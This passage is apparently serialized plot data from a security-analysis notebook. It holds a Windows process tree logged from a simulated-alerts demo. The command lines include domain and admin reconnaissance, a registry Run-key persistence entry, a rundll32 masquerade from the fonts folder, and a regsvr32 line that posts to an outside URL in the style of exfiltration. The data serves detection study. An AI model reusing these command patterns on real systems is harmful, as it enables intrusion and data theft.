:\"lightgrey\"},\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":{\"value\":1.0},\"line_color\":{\"value\":\"black\"},\"line_dash\":[4,4],\"line_width\":{\"value\":2},\"render_mode\":\"css\",\"right_units\":\"screen\",\"top_units\":\"screen\"},\"id\":\"1156\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"editor\":{\"id\":\"1146\",\"type\":\"StringEditor\"},\"field\":\"ParentProcessName\",\"formatter\":{\"id\":\"1145\",\"type\":\"StringFormatter\"},\"title\":\"ParentProcessName\"},\"id\":\"1119\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1076\",\"type\":\"BasicTicker\"},{\"attributes\":{\"editor\":{\"id\":\"1148\",\"type\":\"StringEditor\"},\"field\":\"TargetLogonId\",\"formatter\":{\"id\":\"1147\",\"type\":\"StringFormatter\"},\"title\":\"TargetLogonId\"},\"id\":\"1120\",\"type\":\"TableColumn\"},{\"attributes\":{\"source\":{\"id\":\"1002\",\"type\":\"ColumnDataSource\"}},\"id\":\"1122\",\"type\":\"CDSView\"},{\"attributes\":{\"dimensions\":\"height\"},\"id\":\"1024\",\"type\":\"PanTool\"},{\"attributes\":{\"dimension\":1,\"grid_line_color\":null,\"ticker\":{\"id\":\"1081\",\"type\":\"BasicTicker\"}},\"id\":\"1084\",\"type\":\"Grid\"},{\"attributes\":{\"formatter\":{\"id\":\"1152\",\"type\":\"BasicTickFormatter\"},\"ticker\":{\"id\":\"1081\",\"type\":\"BasicTicker\"},\"visible\":false},\"id\":\"1080\",\"type\":\"LinearAxis\"},{\"attributes\":{\"children\":[{\"id\":\"1003\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"id\":\"1066\",\"subtype\":\"Figure\",\"type\":\"Plot\"}]},\"id\":\"1123\",\"type\":\"Row\"},{\"attributes\":{},\"id\":\"1081\",\"type\":\"BasicTicker\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#1f77b4\"},\"height\":{\"units\":\"data\",\"value\":0.8},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"units\":\"data\",\"value\":1.2},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1098\",\"type\":\"Dodge\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"1101\",\"type\":\"Rect\"},{\"attributes\":{},\"id\":\"1133\",\"type\":\"StringFormatter\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.6},\"fill_color\":{\"value\":\"navy\"},\"height\":{\"units\":\"data\",\"value\":0.8},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"units\":\"data\",\"value\":1.2},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1098\",\"type\":\"Dodge\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"1100\",\"type\":\"Rect\"},{\"attributes\":{\"callback\":null,\"data\":{\"Account\":[\"NaN\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\"],\"CommandLine\":[\"NaN\",\"cmd.exe /c c:\\\\Diagnostics\\\\WinSimulateAlerts.cmd c:\\\\W!ndows\\\\System32 3\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"hostname\",\"netstat  -an\",\"net  user Bob1 /domain\",\"net  user BobX /domain\",\"net  group \\\"Domain Admins\\\" /domain\",\".\\\\reg.exe  add \\\\hkcu\\\\software\\\\microsoft\\\\some\\\\key\\\\Run /v abadvalue\",\"cmd  /c echo End Security Demo tasks\",\"cmd  /c echo Begin Security Demo tasks\",\"cmd  /c echo Any questions about the commands executed here then please contact one of\",\"cmd  /c echo timb@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\".\\\\rundll32.exe  /C c:\\\\windows\\\\fonts\\\\conhost.exe zip archive.mdb\",\".\\\\regsvr32  /u /s c:\\\\windows\\\\fonts\\\\csrss.exe \\\"http://www.401k.com/upload?pass=34592389\\\" post\",\"tasklist\",\"net  localgroup Administrators\",\"whoami\"],\"Computer\":[\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\"],\"EffectiveLogonId\":[\"0x3e7\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\"],\"EffectiveLogonId_par\":[\"NaN\",\"0x3e7\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\"],\"EventID\":[4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688],\"Exe\":[\"svchost.exe\",\"cmd.exe\",\"conhost.exe\",\"HOSTNAME.EXE\",\"NETSTAT.EXE\",\"net.exe\",\"net.exe\",\"net.exe\",\"reg.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"rundll32.exe\",\"regsvr32.exe\",\"tasklist.exe\",\"net.exe\",\"whoami.exe\"],\"IsBranch\":[false,true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false],\"IsLeaf\":[false,false,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true],\"IsRoot\":[true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false],\"Level\":[1,2,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3],\"NewProcessId\":[\"0x498\",\"0x12f4\",\"0x6dc\",\"0x6e8\",\"0xd98\",\"0xfe4\",\"0x2f0\",\"0x18c\",\"0x13a0\",\"0x10dc\",\"0x114c\",\"0xfa4\",\"0x1164\",\"0x12b0\",\"0x1150\",\"0xdd4\",\"0xc34\",\"0xc64\"],\"NewProcessId1\":[\"NaN\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],\"NewProcessId_par\":[\"NaN\",\"0x498\",\"0x12f4\",\"0x12f4\",\"0x12f4\",\"0x12f4\",\"0x12f4\",\"0x12f4\",\"0x12f4\",\"0x12f4\",\"0x12f4\",\"0x12f4\",\"0x12f4\",\"0x12f4\",\"0x12f4\",\"0x12f4\",\"0x12f4\",\"0x12f4\"],\"NewProcessName\":[\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\HOSTNAME.EXE\",\"C:\\\\Windows\\\\System32\\\\NETSTAT.EXE\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\W!ndows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\W!ndows\\\\System32\\\\rundll32.exe\",\"C:\\\\W!ndows\\\\System32\\\\regsvr32.exe\",\"C:\\\\Windows\\\\System32\\\\tasklist.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\whoami.exe\"],\"NewProcessName_par\":[\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\"],\"NodeRole\":[\"NaN\",\"parent\",\"sibling\",\"sibling\",\"sibling\",\"sibling\",\"sibling\",\"sibling\",\"sibling\",\"sibling\",\"sibling\",\"sibling\",\"sibling\",\"sibling\",\"source\",\"sibling\",\"sibling\",\"sibling\"],\"PID\":[\"PID: 0x498 (1176)\",\"PID: 0x12f4 (4852)\",\"PID: 0x6dc (1756)\",\"PID: 0x6e8 (1768)\",\"PID: 0xd98 (3480)\",\"PID: 0xfe4 (4068)\",\"PID: 0x2f0 (752)\",\"PID: 0x18c (396)\",\"PID: 0x13a0 (5024)\",\"PID: 0x10dc (4316)\",\"PID: 0x114c (4428)\",\"PID: 0xfa4 (4004)\",\"PID: 0x1164 (4452)\",\"PID: 0x12b0 (4784)\",\"PID: 0x1150 (4432)\",\"PID: 0xdd4 (3540)\",\"PID: 0xc34 (3124)\",\"PID: 0xc64 (3172)\"],\"ParentProcessName\":[\"NaN\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\"],\"ProcessId\":[\"NaN\",\"0x498\",\"0x12f4\",\"0x12f4\",\"0x12f4\",\"0x12f4\",\"0x12f4\",\"0x12f4\",\"0x12f4\",\"0x12f4\",\"0x12f4\",\"0x12f4\",\"0x12f4\",\"0x12f4\",\"0x12f4\",\"0x12f4\",\"0x12f4\",\"0x12f4\"],\"ProcessId1\":[\"NaN\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],\"ProcessId_par\":[\"NaN\",\"NaN\",\"0x498\",\"0x498\",\"0x498\",\"0x498\",\"0x498\",\"0x498\",\"0x498\",\"0x498\",\"0x498\",\"0x498\",\"0x498\",\"0x498\",\"0x498\",\"0x498\",\"0x498\",\"0x498\"],\"Row\":[18,17,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1],\"SourceComputerId\":[\"NaN\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\"],\"SubjectDomainName\":[\"NaN\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\"],\"SubjectLogonId\":[\"0x3e7\",\"0x3e7\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\"],\"SubjectUserName\":[\"NaN\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\"],\"SubjectUserSid\":[\"NaN\",\"S-1-5-18\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\"],\"TargetLogonId\":[\"NaN\",\"0x78225e\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\"],\"TenantId\":[\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\"],\"TimeCreatedUtc\":{\"__ndarray__\":\"/Knx0k1iQMMAcP2QvY52QgAQ/pC9jnZCADBDkb2OdkIAcESRvY52QgCgTZG9jnZCALBPkb2OdkIAkFGRvY52QgCwVJG9jnZCAPBVkb2OdkIAUBiRvY52QgCQGZG9jnZCAJAakb2OdkIAICORvY52QgCwMJG9jnZCAKA0kb2OdkIAAD6RvY52QgCQQZG9jnZC\",\"dtype\":\"float64\",\"shape\":[18]},\"TimeGenerated\":{\"__ndarray__\":\"AAAAAAAAAAAAcP2QvY52QgAQ/pC9jnZCADBDkb2OdkIAcESRvY52QgCgTZG9jnZCALBPkb2OdkIAkFGRvY52QgCwVJG9jnZCAPBVkb2OdkIAUBiRvY52QgCQGZG9jnZCAJAakb2OdkIAICORvY52QgCwMJG9jnZCAKA0kb2OdkIAAD6RvY52QgCQQZG9jnZC\",\"dtype\":\"float64\",\"shape\":[18]},\"TimeGenerated_orig_par\":{\"__ndarray__\":\"/Knx0k1iQMMAAAAAAAAAAABw/ZC9jnZCAHD9kL2OdkIAcP2QvY52QgBw/ZC9jnZCAHD9kL2OdkIAcP2QvY52QgBw/ZC9jnZCAHD9kL2OdkIAcP2QvY52QgBw/ZC9jnZCAHD9kL2OdkIAcP2QvY52QgBw/ZC9jnZCAHD9kL2OdkIAcP2QvY52QgBw/ZC9jnZC\",\"dtype\":\"float64\",\"shape\":[18]},\"TokenElevationType\":[\"NaN\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\"],\"cmd\":[\"cmdline unknown\",\"cmd.exe /c c:\\\\Diagnostics\\\\WinSimulateAlerts.cmd c:\\\\W!ndows\\\\System32 3\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"hostname\",\"netstat  -an\",\"net  user Bob1 /domain\",\"net  user BobX /domain\",\"net  group \\\"Domain Admins\\\" /domain\",\".\\\\reg.exe  add \\\\hkcu\\\\software\\\\microsoft\\\\some\\\\key\\\\Run /v abadvalue\",\"cmd  /c echo End Security Demo tasks\",\"cmd  /c echo Begin Security Demo tasks\",\"cmd  /c echo Any questions about the commands executed here then please contact one of\",\"cmd  /c echo timb@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\".\\\\rundll32.exe  /C c:\\\\windows\\\\fonts\\\\conhost.exe zip archive.mdb\",\".\\\\regsvr32  /u /s c:\\\\windows\\\\fonts\\\\csrss.exe \\\"http://www.401k.com/upload?pass=34592389\\\" post\",\"tasklist\",\"net  localgroup Administrators\",\"whoami\"],\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17],\"new_process_lc\":[\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\hostname.exe\",\"c:\\\\windows\\\\system32\\\\netstat.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\w!ndows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\w!ndows\\\\system32\\\\rundll32.exe\",\"c:\\\\w!ndows\\\\system32\\\\regsvr32.exe\",\"c:\\\\windows\\\\system32\\\\tasklist.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\whoami.exe\"],\"new_process_lc_par\":[\"NaN\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\"],\"parent_index\":[\"NaN\",\"17\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\"],\"parent_key\":[\"NaN\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x4981970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f42019-02-14 11:51:37.687000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f42019-02-14 11:51:37.687000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f42019-02-14 11:51:37.687000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f42019-02-14 11:51:37.687000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f42019-02-14 11:51:37.687000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f42019-02-14 11:51:37.687000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f42019-02-14 11:51:37.687000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f42019-02-14 11:51:37.687000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f42019-02-14 11:51:37.687000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f42019-02-14 11:51:37.687000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f42019-02-14 11:51:37.687000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f42019-02-14 11:51:37.687000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f42019-02-14 11:51:37.687000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f42019-02-14 11:51:37.687000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f42019-02-14 11:51:37.687000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f42019-02-14 11:51:37.687000\"],\"parent_proc_lc\":[\"NaN\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\"],\"path\":[\"17\",\"17/0\",\"17/0/1\",\"17/0/10\",\"17/0/11\",\"17/0/12\",\"17/0/13\",\"17/0/14\",\"17/0/15\",\"17/0/16\",\"17/0/2\",\"17/0/3\",\"17/0/4\",\"17/0/5\",\"17/0/6\",\"17/0/7\",\"17/0/8\",\"17/0/9\"],\"proc_key\":[\"c:\\\\windows\\\\system32\\\\svchost.exe0x4981970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f42019-02-14 11:51:37.687000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x6dc2019-02-14 11:51:37.697000\",\"c:\\\\windows\\\\system32\\\\hostname.exe0x6e82019-02-14 11:51:38.803000\",\"c:\\\\windows\\\\system32\\\\netstat.exe0xd982019-02-14 11:51:38.823000\",\"c:\\\\windows\\\\system32\\\\net.exe0xfe42019-02-14 11:51:38.970000\",\"c:\\\\windows\\\\system32\\\\net.exe0x2f02019-02-14 11:51:39.003000\",\"c:\\\\windows\\\\system32\\\\net.exe0x18c2019-02-14 11:51:39.033000\",\"c:\\\\w!ndows\\\\system32\\\\reg.exe0x13a02019-02-14 11:51:39.083000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x10dc2019-02-14 11:51:39.103000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x114c2019-02-14 11:51:38.117000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xfa42019-02-14 11:51:38.137000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11642019-02-14 11:51:38.153000\",\"c:\\\\w!ndows\\\\system32\\\\rundll32.exe0x12b02019-02-14 11:51:38.290000\",\"c:\\\\w!ndows\\\\system32\\\\regsvr32.exe0x11502019-02-14 11:51:38.507000\",\"c:\\\\windows\\\\system32\\\\tasklist.exe0xdd42019-02-14 11:51:38.570000\",\"c:\\\\windows\\\\system32\\\\net.exe0xc342019-02-14 11:51:38.720000\",\"c:\\\\windows\\\\system32\\\\whoami.exe0xc642019-02-14 11:51:38.777000\"],\"source_index\":[\"17\",\"0\",\"1\",\"10\",\"11\",\"12\",\"13\",\"14\",\"15\",\"16\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\",\"9\"],\"source_index_par\":{\"__ndarray__\":\"AAAAAAAA+H8AAAAAAAD4fwAAAAAAADBAAAAAAAAAMEAAAAAAAAAwQAAAAAAAADBAAAAAAAAAMEAAAAAAAAAwQAAAAAAAADBAAAAAAAAAMEAAAAAAAAAwQAAAAAAAADBAAAAAAAAAMEAAAAAAAAAwQAAAAAAAADBAAAAAAAAAMEAAAAAAAAAwQAAAAAAAADBA\",\"dtype\":\"float64\",\"shape\":[18]}},\"selected\":{\"id\":\"1128\",\"type\":\"Selection\"},\"selection_policy\":{\"id\":\"1129\",\"type\":\"UnionRenderers\"}},\"id\":\"1002\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"text\":\"\"},\"id\":\"1127\",\"type\":\"Title\"},{\"attributes\":{},\"id\":\"1152\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{},\"id\":\"1128\",\"type\":\"Selection\"},{\"attributes\":{\"data_source\":{\"id\":\"1002\",\"type\":\"ColumnDataSource\"},\"glyph\":{\"id\":\"1100\",\"type\":\"Rect\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1101\",\"type\":\"Rect\"},\"selection_glyph\":null,\"view\":{\"id\":\"1103\",\"type\":\"CDSView\"}},\"id\":\"1102\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"1129\",\"type\":\"UnionRenderers\"},{\"attributes\":{},\"id\":\"1085\",\"type\":\"PanTool\"},{\"attributes\":{},\"id\":\"1130\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1131\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1135\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1132\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1086\",\"type\":\"WheelZoomTool\"},{\"attributes\":{\"data_source\":{\"id\":\"1002\",\"type\":\"ColumnDataSource\"},\"glyph\":{\"id\":\"1051\",\"type\":\"Text\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1052\",\"type\":\"Text\"},\"selection_glyph\":null,\"view\":{\"id\":\"1054\",\"type\":\"CDSView\"}},\"id\":\"1053\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"1089\",\"type\":\"ResetTool\"},{\"attributes\":{},\"id\":\"1134\",\"type\":\"StringEditor\"},{\"attributes\":{\"overlay\":{\"id\":\"1156\